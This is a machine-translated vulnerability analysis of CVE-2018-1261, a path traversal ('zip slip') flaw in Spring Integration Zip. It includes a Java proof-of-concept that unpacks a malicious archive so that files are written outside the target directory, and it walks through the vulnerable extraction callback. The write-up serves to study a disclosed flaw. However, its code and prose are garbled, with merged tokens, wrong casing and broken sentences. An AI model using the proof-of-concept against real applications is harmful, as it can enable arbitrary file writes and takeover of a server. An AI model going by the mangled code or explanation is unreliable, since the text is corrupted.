"Code Audit" Spring Integration zip unsafe decompression (cve-2018-1261) Vulnerability analysis

1. Vulnerability related information

Vulnerability name : Spring Integration Zip unsafe decompression

Vulnerability number : cve-2018-1261

Vulnerability Description : In versions prior to Spring-integration-zip.v1.0.1.release, a malicious user constructs a file containing a specific file name in a compressed file (the affected file format is bzip2, tar, XZ, war , Cpio, 7z), when an application uses Spring-integration-zip for decompression, it can cause an attack of any file vulnerability to be written across directories. In turn, it is possible to be getshell and remotely controlled.

Vulnerability principle : An attacker could construct a band that contains a name. /prefix the file of the compressed package, when the Spring-integration-zip to extract files out of the directory limit, create files

Exploit pre-conditions :

1. Using the Spring-integration-zip Library

2. Receive and unzip compressed files from non-trusted sources

2. Environment Construction Libraries:

3. The vulnerability to reproduce the contents of a malicious compressed package file

The test code is as follows

unZipTransformer.setWorkDirectory(path);Set the path to understand the pressure file, in the cve-2018-1261 directory will generate the Good.txt file, and the eval file will escape the limit, the root directory generated files

ImportOrg.springframework.core.io.DefaultResourceLoader;ImportOrg.springframework.core.io.Resource;ImportOrg.springframework.core.io.ResourceLoader;ImportOrg.springframework.integration.support.MessageBuilder;ImportOrg.springframework.integration.zip.transformer.UnZipTransformer;ImportOrg.springframework.messaging.Message;ImportJava.io.File;ImportJava.io.InputStream; Public classMain {Private StaticResourceloader Resourceloader =NewDefaultresourceloader (); Private StaticFile Path =NewFile ("./cve-2018-1261/"));  Public Static voidMainFinalString ... args) {        FinalResource Evilresource = Resourceloader.getresource ("Classpath:zip-malicious-traversal.zip"); Try{InputStream Evilis=Evilresource.getinputstream (); Message<InputStream> Evilmessage =messagebuilder.withpayload (Evilis). build (); Unziptransformer Unziptransformer=NewUnziptransformer (); //set the extracted file directory to cve-2018-1261unziptransformer.setworkdirectory (path);            Unziptransformer.afterpropertiesset (); //Vulnerability Entry pointUnziptransformer.transform (evilmessage); }Catch(Exception e) {System.out.println (e); }    }}

The Unziptransformer.transform () in the example calls Doziptransform () to process the compressed package

The process () in callback zipentrycallback processes the contents and files within the compressed package as it traverses

Ziputil.iterate (InputStream,NewZipentrycallback () {@Override Public voidProcess (InputStream Zipentryinputstream, ZipEntry zipentry)throwsIOException {FinalString Zipentryname =Zipentry.getname (); ...        if(ZipResultType.FILE.equals (Zipresulttype)) {FinalFile TempDir =NewFile (Workdirectory, Message.getheaders (). GetId (). toString ()); Tempdir.mkdirs (); //Nosonar false Positive            FinalFile Destinationfile =NewFile (TempDir, zipentryname); if(Zipentry.isdirectory ()) {...} Else{springziputils.copy (Zipentryinputstream, destinationfile);            Uncompresseddata.put (Zipentryname, destinationfile); }        }    ...}

.. /.. /.. /That string was obtained by zipEntry.getName() the

final File destinationFile = new File(tempDir, zipEntryName);Identify the extracted directory

And then call copy put.

Get incoming input data and get input bytes from a file in the file system, write the data to Destinationfile.

To create the Tmp folder in the root directory ahead of time

"Code Audit" Spring Integration zip unsafe decompression (cve-2018-1261) Vulnerability analysis